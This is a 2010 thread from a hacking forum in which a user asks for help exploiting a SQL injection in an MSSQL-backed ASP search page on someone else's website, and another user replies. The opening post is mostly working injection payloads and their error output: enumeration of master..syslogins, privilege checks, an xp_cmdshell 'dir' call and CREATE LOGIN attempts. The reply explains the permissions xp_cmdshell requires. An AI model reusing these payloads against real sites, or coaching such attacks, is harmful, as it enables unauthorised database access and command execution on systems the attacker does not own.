Waraxe IT Security Portal
Login or Register
November 17, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 49
Members: 0
Total: 49
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Mssql Injection?
Post new topicReply to topic View previous topic :: View next topic
Mssql Injection?
PostPosted: Mon Jun 28, 2010 6:11 pm Reply with quote
kr0k0
Advanced user
Advanced user
Joined: Jan 26, 2008
Posts: 128





Hi..;I m not abel to do something here Cuz it give "No permission" Each time I inject sometime..Damn, Maybe you can help me..I will explain more.

Here is the vuln URL..


Code:
http://www.URL.com/think/search.asp


I think It should be like that..

Code:
<form action="http://www.URL.com/think/search.asp" method="POST">
<input name="search_keyword" type="text" value="vsat">
<input type="submit" value="Inject !">


Look at all thes request and all their error given please..

Code:
vsat

work!

Code:
vsat'
vsat'/*
vsat')/*
vsat"/*
vsat"--


SQL Error!..

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/think/search.asp, line 91


Euh It work here..And it give a normal page as "vsat"..
Code:
vsat'--




But I tried with AND/OR/UNION/GROUP BY/ORDER BY/HAVING.. and it didnt work..It give the same SQL error

Code:
vsat' OR 1=1--
vsat' AND 1=1--
vsat' having 1=1--


I will post here what they are all injections that worked well, But it give a normal page as "vsat" nothing else..

Code:
vsat'--
vsat' IF (1=1) SELECT 'true' ELSE SELECT 'false'--
vsat' if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0--
vsat' SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC--
vsat' SELECT CHAR(0x66)--
vsat' SELECT 0x5045--
vsat' SELECT 0x50 + 0x45--


I tried many many functions..But they give "No permission ..."

Code:
vsat' exec master..xp_cmdshell 'dir'--


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

/think/search.asp, line 364



Code:
vsat' CREATE LOGIN JohnDoe WITH PASSWORD = 'somepassword'--
vsat' RECONFIGURE;--
vsat' CREATE USER WindowsGroup FROM LOGIN WindowsGroup--


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this action.

/think/search.asp, line 364



SO any answers or help or explanation please share anything with us..
View user's profile Send private message Visit poster's website
PostPosted: Wed Sep 01, 2010 1:23 am Reply with quote
niailuo
Beginner
Beginner
Joined: Aug 31, 2010
Posts: 2




you know,you can use exec.master..xp_cmdshell only at the time when you have the SA permission..
maybe it's a db_owner OR public permission. isn't it ?
Okay .hope you can add me ,and my ICQ:613592918.
I'm so sorry ,i can't speak English very well as I'm a Chinese..
View user's profile Send private message
Mssql Injection?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.051 Seconds